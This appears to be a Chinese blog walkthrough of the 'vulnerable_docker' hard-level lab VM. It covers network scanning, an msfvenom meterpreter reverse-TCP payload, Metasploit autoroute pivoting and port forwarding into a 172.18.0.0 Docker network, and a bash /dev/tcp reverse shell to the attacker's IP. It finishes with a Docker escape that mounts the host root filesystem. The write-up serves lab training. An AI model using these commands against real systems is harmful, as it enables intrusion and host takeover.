当前位置: 首页 > web >正文

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

一、信息收集

1、主机发现

arp-scan -l

2、端口扫描

nmap -sS -sV 192.168.66.146 nmap -p- -Pn -sC -sV -n 192.168.66.146 whatweb -v 192.168.66.146

22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 8000/tcp open  http    Apache httpd 2.4.10 ((Debian))

ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西

3、目录扫描,指纹识别

这个hard难度我打开的时候就已经有之前的缓存了,哪我们直接连接shell即可

4、gitshell,内网信息收集

内网收集

ok,这里找到了个ip,应该和上台靶机一样的 老规矩,探测一下内网存活i

for i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

5、代理搭建

这里直接使用msf模块

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.66.129 LPORT=9999 -f elf > hzy

使用MSF创建稳定shell

我们下载下来,然后kali上开一个监听

use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
msf6 exploit(multi/handler) > set lhost 192.168.66.129
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run

ok,这里拿到了不稳定的shell,接下来我们弹一条shell

添加路由,搭建代理

meterpreter > routeIPv4 network routes
===================Subnet      Netmask      Gateway     Metric  Interface------      -------      -------     ------  ---------0.0.0.0     0.0.0.0      172.18.0.1  0       eth0172.18.0.0  255.255.0.0  0.0.0.0     0       eth0No IPv6 routes were found.
meterpreter > run post/multi/manage/autoroute[*] Running module against 172.18.0.2
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from host's routing table.
meterpreter > run auturoute -p[-] The specified meterpreter session script could not be found: auturoute
meterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table
====================Subnet             Netmask            Gateway------             -------            -------172.18.0.0         255.255.0.0        Session 1

6、内网扫描同网段主机

这里我们直接用net.sh脚本扫内网存活主机了

这里端口转发就要msf的了,比较方便

怪可爱的,msf的logo

portfwd add -l 8022 -p 8022 -r 172.18.0.4

转发成功,访问8022端口

ok,转发成功,这里反弹一个shell,因为这个是docker环境,不能做什么操作 bash -i >& /dev/tcp/192.168.66.129/7777 0>&1 这里出了点问题,就是我的kali端口转发后访问127.0.0.1:8022端口后的页面关闭了之后就再也无法访问了,这里就借鉴其他师傅的wp了。

卡在这个页面再也不动了,有知道的师傅可以评论

apt update
apt install python docker wget
如果docker无法安装成功,可以通过在其他主机上复制docker二进制文件,并下载到容器中

7.使用Python创建虚拟终端

python -c 'import pty; pty.spawn("/bin/bash")' ./docker run -it -v /:/host ubuntu bash cd /host

8.获取flag

这个好像和easy难度没什么区别,如果前面步骤有不懂的可以参考easy难度,哪个写的更完整

http://www.xdnf.cn/news/14436.html

相关文章:

  • vscode python debugger 如何调试老版本python
  • 论文略读:Personality Alignment of Large Language Models
  • Git里面Stash Changes和UnStash Changes使用
  • LiteRT-LM边缘平台上高效运行语言模型
  • 【Android】 BindService源码流程
  • 如何在Windows上使用qemu安装ubuntu24.04服务器?
  • 408第一季 - 数据结构 - B树与B+树
  • 数据结构---B树
  • 卷积神经网络中的通道注意力机制
  • [游戏实时地图] 地图数据 | 兴趣点数据 | 虚幻引擎SDK接口
  • 软考 系统架构设计师系列知识点之杂项集萃(89)
  • UFS Layout Guide (UFS 2.x)
  • 第11章:Neo4j实际应用案例
  • 把Cmakelist.txt转化为Qt Pro文件的方法
  • 如何让 AI 接入自己的 API?我开发了一个将 OpenAPI 文档转为 MCP 服务的工具
  • 深入理解Kafka Consumer:从理论到实战
  • 简化您的工作流程:在 Azure 中构建高效的逻辑应用程序
  • 电池预测 | 第32讲 Matlab基于CNN-BiLSTM-Attention的锂电池剩余寿命预测,附锂电池最新文章汇集
  • Zustand:小而美的React状态管理库详解
  • React 实现卡牌翻牌游戏
  • AI医生24小时在线:你的健康新‘算法监护人
  • 项目 : 基于正倒排的boost搜索引擎
  • 基于n8n快速开发股票舆情监控对话系统
  • Servlet完整笔记
  • 通过 BLE 和 Wi-Fi 交换优化基于 ID 的远程无人机通信的延迟
  • Bootstrap 5学习教程,从入门到精通, Bootstrap 5 列表组(List Group)语法知识点及案例(14)
  • 【图像处理入门】8. 数学基础与优化:线性代数、概率与算法调优实战
  • Python----OpenCV(图像的绘制——绘制椭圆,绘制文本,添加文字水印,添加图片水印)
  • Nginx限速配置详解
  • LeetCode 高频 SQL 50 题(基础版)【题解】合集